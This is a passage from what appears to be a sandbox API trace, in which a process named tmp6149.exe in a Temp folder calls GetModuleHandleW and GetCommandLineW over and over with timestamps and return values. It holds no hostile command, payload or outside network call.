(lpModuleName=0x0) returned 0x400000 [0119.380] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.380] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.380] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.380] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.380] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.380] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.380] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.380] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.380] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.380] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.380] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.380] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.380] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.380] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.380] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.381] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.381] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.381] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.381] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.381] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.381] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.381] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.381] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.381] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.381] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.381] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.381] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.381] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.381] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.382] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.382] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.382] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.382] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.382] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.382] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.382] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.382] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.382] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.382] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.382] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.382] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.382] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.382] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.383] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.383] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.383] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.383] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.383] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.383] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.383] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.383] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.383] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.383] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.383] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.383] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.383] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.383] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.383] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.383] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.383] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.383] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.383] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.383] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.383] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.384] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.384] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.384] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.384] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.384] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.384] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.384] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.384] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.384] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.384] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.384] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.384] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.384] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.384] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.384] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.384] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.384] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.384] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.384] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.384] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.385] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.385] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.385] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.385] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.385] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.385] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.385] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.385] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.385] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.385] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.385] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.385] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.385] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.385] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.385] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.386] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.386] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.386] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.386] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.386] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.386] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.386] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.386] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.386] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.386] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.386] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.386] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.386] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.386] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.386] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.386] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.386] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.386] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.386] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.386] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.387] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.387] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.387] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.387] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.387] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.387] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.387] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.387] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.387] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.387] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.387] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.387] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.387] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.387] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.387] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.387] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.387] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.387] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.387] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.387] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.387] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.387] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.388] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.388] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.388] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.388] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.388] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.388] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.388] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.388] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.388] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.388] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.388] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.388] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.388] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.388] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.388] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.388] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.388] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.388] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.388] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.388] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.388] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.388] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.389] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.389] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.389] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.389] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.389] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.389] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.389] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.389] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.389] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.389] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.389] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.389] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.389] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.389] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.389] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.389] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.389] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.389] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.389] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.389] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.389] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.389] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.390] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.390] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.390] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.390] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.390] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.390] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.390] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.390] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.390] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.390] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.390] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.390] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.390] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.390] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.390] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.390] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.390] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.390] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.390] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.390] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.391] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.391] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.391] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.391] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.391] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.391] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.391] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.391] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.391] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.391] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.391] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.391] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.391] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.391] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.391] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.391] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.391] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.391] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.391] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.391] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.392] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.392] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.392] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.392] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.392] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.392] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.392] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.392] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.392] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.392] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.392] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.392] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.392] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.392] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.392] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.392] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.392] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.392] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.392] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.392] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.392] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.392] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.393] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.393] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.393] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.393] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.393] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.393] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.393] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.393] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.393] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.393] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.393] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.393] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.393] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.393] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.393] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.393] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.393] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.393] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.393] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.393] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.394] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.394] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.394] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.394] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.394] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.394] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.394] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.394] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.394] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.394] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.394] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.394] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.394] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.394] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.394] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.394] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.394] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.394] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.394] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.394] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.394] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.394] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.395] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.395] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.395] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.395] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.395] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.395] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.395] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.395] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.395] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.395] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.395] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.395] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.395] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.395] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.395] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.395] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.395] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.395] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.395] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.395] GetCommandLineW () 